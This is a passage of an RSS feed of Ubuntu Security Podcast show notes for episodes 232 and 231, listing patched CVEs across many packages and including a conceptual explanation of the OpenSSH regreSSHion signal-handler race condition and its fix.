<li><a href="https://ubuntu.com/security/CVE-2023-7104">CVE-2023-7104</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5615-3-sqlite-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5615-3">USN-5615-3</a>] SQLite vulnerability</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20223">CVE-2021-20223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35527">CVE-2020-35527</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35525">CVE-2020-35525</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6855-1-libcdio-vulnerability--06-58">[<a href="https://ubuntu.com/security/notices/USN-6855-1">USN-6855-1</a>] libcdio vulnerability (06:58)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-36600">CVE-2024-36600</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ISO file parser - used strcpy() instead of strncpy() so could be made to quite
easily achieve buffer overflow and hence possible code-execution</li>
</ul>
<h3 id="usn-6858-1-espeak-ng-vulnerabilities--07-33">[<a href="https://ubuntu.com/security/notices/USN-6858-1">USN-6858-1</a>] eSpeak NG vulnerabilities (07:33)</h3>
<ul>
<li>5 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-49994">CVE-2023-49994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49993">CVE-2023-49993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49992">CVE-2023-49992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49991">CVE-2023-49991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49990">CVE-2023-49990</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>speech synthesiser - pass file to it and it will read it aloud</li>
<li>various buffer overflows when parsing different formats - found by a researcher via fuzzing</li>
</ul>
<h3 id="usn-6844-2-cups-regression--07-51">[<a href="https://ubuntu.com/security/notices/USN-6844-2">USN-6844-2</a>] CUPS regression (07:51)</h3>
<ul>
<li>Affecting Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)</li>
<li><a href="/episode-231/#usn-6844-1-cups-vulnerability--04-08">[USN-6844-1] CUPS vulnerability from Episode 231</a></li>
</ul>
<h3 id="usn-6860-1-openvpn-vulnerabilities--07-57">[<a href="https://ubuntu.com/security/notices/USN-6860-1">USN-6860-1</a>] OpenVPN vulnerabilities (07:57)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-5594">CVE-2024-5594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-28882">CVE-2024-28882</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Client was able to keep the session alive even when the server had been
instructed to disconnect the client</li>
<li>Client was able to send junk/non-printable characters in the control channel
since would then get logged and possibly allow to corrupt the log file or
cause high CPU load</li>
</ul>
<h3 id="usn-6862-1-firefox-vulnerabilities--08-27">[<a href="https://ubuntu.com/security/notices/USN-6862-1">USN-6862-1</a>] Firefox vulnerabilities (08:27)</h3>
<ul>
<li>13 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-5696">CVE-2024-5696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5695">CVE-2024-5695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5694">CVE-2024-5694</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5688">CVE-2024-5688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5701">CVE-2024-5701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5700">CVE-2024-5700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5699">CVE-2024-5699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5698">CVE-2024-5698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5697">CVE-2024-5697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5693">CVE-2024-5693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5691">CVE-2024-5691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5690">CVE-2024-5690</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-5689">CVE-2024-5689</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://www.mozilla.org/en-US/firefox/127.0.2/releasenotes/">127.0.2</a></li>
</ul>
<h3 id="usn-6859-1-openssh-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6859-1">USN-6859-1</a>] OpenSSH vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-6387">CVE-2024-6387</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="deep-dive-into-regresshion-remote-unauthenticated-code-execution-vulnerablity-in-openssh">Deep-dive into regreSSHion - Remote Unauthenticated Code Execution Vulnerablity in OpenSSH</h3>
<ul>
<li><a href="https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server">https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server</a></li>
<li><a href="https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt">https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt</a></li>
<li><a href="https://ubuntu.com/blog/ubuntu-regresshion-security-fix">https://ubuntu.com/blog/ubuntu-regresshion-security-fix</a></li>
<li>First notified late last week by Qualys of a pending update for OpenSSH which
fixes a newly discovered unauthenticated remote code execution vulnerability -
<strong>as root</strong> - this is about as bad as it can get
<ul>
<li>Exactly the kind of thing that &ldquo;Jia Tan&rdquo; spent all that time working on in
xz-utils to try and achieve (<a href="/episode-224/#xz-utils-backdoor-and-ubuntu">xz-utils backdoor and Ubuntu from Episode 224</a>)</li>
</ul>
</li>
<li>Qualys are quite specific to note that this only affects OpenSSH on glibc (so
distros which use say musl are not affected) - due to the intricacies of the
vulnerablity and how they exploit it</li>
<li>Also OpenSSH is quite carefully designed - employs privilege separation to try
keep the privileged part as minimal as possible - but in this case, the vuln
is in this privielged part, hence why code execution as root</li>
<li>OpenSSH developers released 9.8p1 on Monday this week which has some quite
significant refactoring to help address this vuln - in particular it includes
functionality similar to fail2ban to penalise clients that appear to be
malicious AND it employs even more privilege separation than before</li>
<li>Qualys are quite careful to say that they think OpenSSH is one of the most
secure pieces of software in the world &ldquo;near-flawless implementation&rdquo; with
inspirational defense-in-depth - but clearly bugs still slip through</li>
<li>In this case is a signal handler race condition
<ul>
<li>Diversion - what are signals?
<ul>
<li><a href="https://manpages.ubuntu.com/manpages/noble/en/man7/signal.7.html">signal (7)</a>
<ul>
<li>simple, asynchronous form of IPC which allows sending a single piece of information - the type of signal
<ul>
<li>many different types - e.g. SIGSEGV for invalid memory access, or
SIGFPE for a math error - or can be sent by other processes - SIGTERM
/ SIGKILL / SIGINT</li>
<li>process can then set itself up so that a particular signal handler
function of its choosing is invoked for a given signal</li>
<li>when a signal is sent to a process, it is queued up and then delivered
to a process the next time the kernel returns from kernel space to
that process - ie. when returning from a system-call or scheduling of
that process</li>
<li>to deliver it, kernel constructs an entirely new stack frame and
passes execution to the signal handler function - this runs and then
eventually returns control back to the original thread of the process</li>
</ul>
</li>
</ul>
</li>
<li>Signal handlers are special - since they run on their own special stack
and outside of the normal thread of execution of the process, they can
potentially cause issues if they do things which modify the global state
of the process - many regular functions are off-limits within signal
handlers since they can inadvertently modify such global state
<ul>
<li>only some functions are hence <a href="https://manpages.ubuntu.com/manpages/noble/en/man7/signal-safety.7.html">async-signal-safe (7)</a>
<ul>
<li>list contains a lot of functions BUT many which might ordinarily get
used are not included - in particular <a href="https://manpages.ubuntu.com/manpages/noble/man3/malloc.3.html"><code>malloc()/free()</code></a></li>
</ul>
</li>
</ul>
</li>
<li>This vuln was caused then by use of one of these async unsafe functions</li>
</ul>
</li>
<li>OpenSSH has a functionality called LoginGraceTime which allows an admin to
configure how long OpenSSH will allow a client to take to login - if they
don&rsquo;t log in in that time then it closes the connection
<ul>
<li>Since this code is all single-threaded, can&rsquo;t just have the code which is
listening to the client connection bail out easily - so instead this is
implemented via the SIGALARM signal - used by the <a href="https://manpages.ubuntu.com/manpages/noble/en/man2/alarm.2.html">alarm (2)</a> system call to
configure the SIGALARM signal to be delivered to a process some number of
seconds later</li>
<li>Unfortunately in the signal handler function for this SIGALARM, OpenSSH
can end up calling <code>syslog()</code> when trying to which is one of those unsafe functions
<ul>
<li>in glibc <code>syslog()</code> will potentially call <code>malloc()/free()</code> which as we
mentioned earlier is not async safe
<ul>
<li>it is possible that the original thread may be in the middle of a call
to <code>malloc() / free()</code> and then <code>SIGALARM</code> signal is delivered (since
<code>malloc()/free()</code> calls <a href="https://manpages.ubuntu.com/manpages/noble/man2/brk.2.html">brk (2)</a> system call under the hood and so a
pending signal <code>SIGALARM</code> may be delivered on return from <code>brk()</code>)</li>
<li>both the original thread and the signal handler are then calling
<code>malloc()</code> at the same time - corrupting the global state of the heap
etc</li>
<li>as we know, if can corrupt the heap state &lsquo;correctly&rsquo; can get code
execution</li>
<li>but requires the ability to win this race</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>In fact, this is a reoccurrence of historical <a href="https://ubuntu.com/security/CVE-2006-5051">CVE-2006-5051</a> - discovered by
Mark Dowd but subsequently fixed
<ul>
<li>code in question was refactored in October 2020 and released in OpenSSH
8.5p1 which would then call <code>syslog()</code> during the <code>SIGALARM</code> signal handler</li>
</ul>
</li>
</ul>
</li>
<li>To exploit this, Qualys take inspiration from a <a href="https://lcamtuf.coredump.cx/signals.txt">2001 paper by Michal Zalewski</a>
(aka lcamtuf previously Director of Information Security Engineering at Google
and now VP Security Engineering at Snap (ie Snapchat etc))</li>
<li>Even so, it is an incredibly difficult path to get to a working exploit - both
since this is a race-condition so it is very hard to get the right timing
conditions and second due to defence-in-depth measures like ASLR
<ul>
<li>First develop an exploit for the original 2006 CVE against a couple older versions
<ul>
<li>OpenSSH 3.4p1 on Debian Woody
<ul>
<li>even on i386 which has much worse ASLR than amd64, takes 10,000 tries to
win the race - even then with 10 concurrent connections and each with a
LoginGraceTime of 5 minutes - ~1week to get a remote root shell</li>
</ul>
</li>
<li>OpenSSH 4.2p1 on Ubuntu 6.06 (Dapper Drake) - first LTS version of
Ubuntu - this vuln was patched during the lifetime of 6.06 release but
original install media still contains the unpatched version
<ul>
<li>Similarly, takes ~10,000 tries to win the race - with LoginGraceTime of
only 2 minutes can reduce the time to get a remote root shell to 1-2
days</li>
</ul>
</li>
<li>Finally, OpenSSH 9.2p1 from current Debian stable on i386
<ul>
<li>10,000 tries - now 100 connections with 2 minutes grace time - in
practice still ~6-8 hours since still have to guess the address used by
glibc and due to ASLR is only 50% accurate</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>All of these are lab conditions - VMs with quite stable network - and only on
i386 - but Qualys say they were starting on an exploit even for amd64 but
didn&rsquo;t continue after they noticed a related bug report about this
async-unsafe signal handling - so decided that may draw attention to the issue
and others may discover the vuln and start exploiting it - so best to disclose
it in its current state</li>
<li>For Ubuntu, since this only affects version since 8.5p1, only 22.04 LTS
onwards were affected - we released patches on Monday - unattended-upgrades is
enabled by default on all relases since 16.04 LTS anyway - checks for and
installs security updates every 24 hours - so any affected Ubuntu users would
likely have been automatically patched within ~24 of the vuln becoming public
(and the restart logic in OpenSSH would have restarted the service when it got
upgraded as well)</li>
<li>Other thing which is more internal for Ubuntu is that Qualys explicitly called
out OpenSSH in 24.04 LTS as having a deficiency in the enablement of ASLR -
since we are using systemd socket activation we disable reexec support for
OpenSSH - so it never reexecutes itself for its child processes - so they
never get the benefit of ASLR - BUT by chance it also makes this unexploitable
since it changes the use of <code>syslog()</code> within OpenSSH so that <code>syslog()</code> gets
called early on in the use of OpenSSH and so then when it gets called in the
SIGALARM signal handler it doesn&rsquo;t do the same memory allocation and hence
can&rsquo;t be used to corrupt memory and get code execution</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E232.mp3" length="29614794" type="audio/mpeg" /><itunes:duration>1760</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 231
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-231/</link>
          <pubDate>Fri, 28 Jun 2024 19:15:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>5e6c69d53c1d16b3c824c806db52971853b8b00ea973f251169f8aaa8476e4c258d696025d8ac3bcd06ee5d7c1bdf2895223b0d60320ef09fc62cbd454eebe87</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 231</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A look into CISA's Known Exploited Vulnerability Catalogue is on our minds this
  week, plus we look at vulnerability updates for gdb, Ansible, CUPS, libheif,
  Roundcube, the Linux kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A look into CISA's Known Exploited Vulnerability Catalogue is on our minds this
  week, plus we look at vulnerability updates for gdb, Ansible, CUPS, libheif,
  Roundcube, the Linux kernel and more.
  </itunes:summary>
        <description>  A look into CISA's Known Exploited Vulnerability Catalogue is on our minds this
  week, plus we look at vulnerability updates for gdb, Ansible, CUPS, libheif,
  Roundcube, the Linux kernel and more.
  </description>
        <googleplay:description>  A look into CISA's Known Exploited Vulnerability Catalogue is on our minds this
  week, plus we look at vulnerability updates for gdb, Ansible, CUPS, libheif,
  Roundcube, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A look into CISA&rsquo;s Known Exploited Vulnerability Catalogue is on our minds this
week, plus we look at vulnerability updates for gdb, Ansible, CUPS, libheif,
Roundcube, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>175 unique CVEs addressed</p>
<h3 id="usn-6842-1-gdb-vulnerabilities--01-10">[<a href="https://ubuntu.com/security/notices/USN-6842-1">USN-6842-1</a>] gdb vulnerabilities (01:10)</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39130">CVE-2023-39130</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39129">CVE-2023-39129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39128">CVE-2023-39128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1972">CVE-2023-1972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4285">CVE-2022-4285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16599">CVE-2020-16599</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>a couple of these are inherited from binutils as they share that code -
parsing of crafted ELF executables -&gt; NULL ptr deref or possible heap based
buffer overflow -&gt; DoS/RCE</li>
<li>other stack and heap buffer overflows as well - parsing of crafted ada files
and crafted debug info files as well -&gt; DoS/RCE</li>
</ul>
<h3 id="usn-6845-1-hibernate-vulnerability--02-12">[<a href="https://ubuntu.com/security/notices/USN-6845-1">USN-6845-1</a>] Hibernate vulnerability (02:12)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25638">CVE-2020-25638</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Object relational-mapping (ORM) library for Java</li>
<li>SQL injection in the JPA Criteria API implementation - could allow unvalidated
literals when they are used in the SQL comments of a query when logging is
enabled - fixed by properly escaping comments in this case</li>
</ul>
<h3 id="usn-6846-1-ansible-vulnerabilities--02-46">[<a href="https://ubuntu.com/security/notices/USN-6846-1">USN-6846-1</a>] Ansible vulnerabilities (02:46)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5764">CVE-2023-5764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3697">CVE-2022-3697</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possibly would leak the password into log file when using the AWS EC2 module
since failed to validate the <code>tower_callback</code> (nowadays is called <code>aap_callback</code> -
Ansible Automation Platform) parameter appropriately</li>
<li>Allows to mark variables as <code>unsafe</code> - in that they may come from an external,
untrusted source - won&rsquo;t get evaluated/expanded when used to avoid possible
info leaks etc - various issues where ansible would fail to respect this and
essentially forget they were tagged as unsafe and end up exposing secrets as a
result</li>
</ul>
<h3 id="usn-6844-1-cups-vulnerability--04-08">[<a href="https://ubuntu.com/security/notices/USN-6844-1">USN-6844-1</a>] CUPS vulnerability (04:08)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-35235">CVE-2024-35235</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When starting, cups would arbitrarily chmod the socket specified as the Listen
parameter to make it world-writable - if this was a symlink, would then make
the target of the symlink world-readable - in general the cups config file is
only writable by root so requires some other vuln to be able to exploit it
where you can get write access to the config file to exploit it OR be able to
replace the regular cups socket path with a user-controlled symlink - but if
you can, then you can even change the cups config itself to be world-writable
and hence modify other parameters like the user and group that cups should run
as, as well as a crafted <code>FoomaticRIPCommandLine</code> then can run arbitrary commands
as root</li>
</ul>
<h3 id="usn-6849-1-salt-vulnerabilities--06-20">[<a href="https://ubuntu.com/security/notices/USN-6849-1">USN-6849-1</a>] Salt vulnerabilities (06:20)</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11652">CVE-2020-11652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11651">CVE-2020-11651</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly validate paths in some methods and also failed to restrict
access to other methods, allowing them to be used without authentication -
could then either allow arbitrary directory access or the ability to retrieve
tokens from the master or run arbitrary commands on minions</li>
</ul>
<h3 id="usn-6746-2-google-guest-agent-and-google-os-config-agent-vulnerability--06-44">[<a href="https://ubuntu.com/security/notices/USN-6746-2">USN-6746-2</a>] Google Guest Agent and Google OS Config Agent vulnerability (06:44)</h3>
<ul>
<li>1 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24786">CVE-2024-24786</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>A vuln in the embedded golang protobuf module - when parsing JSON could end up
in an infinite loop -&gt; DoS</li>
</ul>
<h3 id="usn-6850-1-openvpn-vulnerability--07-04">[<a href="https://ubuntu.com/security/notices/USN-6850-1">USN-6850-1</a>] OpenVPN vulnerability (07:04)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0547">CVE-2022-0547</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-155/#usn-5347-1-openvpn-vulnerability-02-00">[USN-5347-1] OpenVPN vulnerability from Episode 155</a> - possibly gets confused
when using multiple authentication plugins and deferred authentication</li>
</ul>
<h3 id="usn-6847-1-libheif-vulnerabilities--07-36">[<a href="https://ubuntu.com/security/notices/USN-6847-1">USN-6847-1</a>] libheif vulnerabilities (07:36)</h3>
<ul>
<li>8 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-49464">CVE-2023-49464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49463">CVE-2023-49463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49462">CVE-2023-49462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49460">CVE-2023-49460</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29659">CVE-2023-29659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0996">CVE-2023-0996</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-23109">CVE-2020-23109</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11471">CVE-2019-11471</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>First time to mention libheif on the podcast - High Efficiency Image File
Format - part of the MPEG-H standard - container format used to store images
or sequences of images</li>
<li>Commonly seen due to its use by Apple for images on iPhone</li>
<li>C++ - usual types of issues
<ul>
<li>UAF, buffer overflows, floating point exception etc
<ul>
<li>most found through fuzzing</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-6848-1-roundcube-vulnerabilities--08-21">[<a href="https://ubuntu.com/security/notices/USN-6848-1">USN-6848-1</a>] Roundcube vulnerabilities (08:21)</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-37384">CVE-2024-37384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-37383">CVE-2024-37383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47272">CVE-2023-47272</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5631">CVE-2023-5631</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>webmail front-end for IMAP</li>
<li>2 different possible XSS issues due to mishandling of SVG - email containing
an SVG could embed JS that then gets loaded when the email is viewed</li>
<li>Also possible XSS through a crafted user preference value - similarly through
a crafted Content-Type/Content-Disposition header which can be used for
attachment preview/download</li>
</ul>
<h3 id="usn-6819-4-linux-kernel--oracle--vulnerabilities--09-21">[<a href="https://ubuntu.com/security/notices/USN-6819-4">USN-6819-4</a>] Linux kernel (Oracle) vulnerabilities (09:21)</h3>
<ul>
<li>149 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26631">CVE-2024-26631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52694">CVE-2023-52694</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52685">CVE-2023-52685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52682">CVE-2023-52682</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35835">CVE-2024-35835</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52446">CVE-2023-52446</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52487">CVE-2023-52487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52619">CVE-2023-52619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52627">CVE-2023-52627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52674">CVE-2023-52674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26598">CVE-2024-26598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52679">CVE-2023-52679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52455">CVE-2023-52455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26671">CVE-2024-26671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52683">CVE-2023-52683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52690">CVE-2023-52690</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35842">CVE-2024-35842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52610">CVE-2023-52610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26607">CVE-2024-26607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52445">CVE-2023-52445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52497">CVE-2023-52497</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52488">CVE-2023-52488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26623">CVE-2024-26623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52607">CVE-2023-52607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52677">CVE-2023-52677</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52457">CVE-2023-52457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26673">CVE-2024-26673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26594">CVE-2024-26594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26638">CVE-2024-26638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52621">CVE-2023-52621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52594">CVE-2023-52594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52468">CVE-2023-52468</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26647">CVE-2024-26647</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52492">CVE-2023-52492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52452">CVE-2023-52452</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26615">CVE-2024-26615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52448">CVE-2023-52448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52698">CVE-2023-52698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52614">CVE-2023-52614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52494">CVE-2023-52494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35837">CVE-2024-35837</a> <!-- raw HTML omitted --></li>
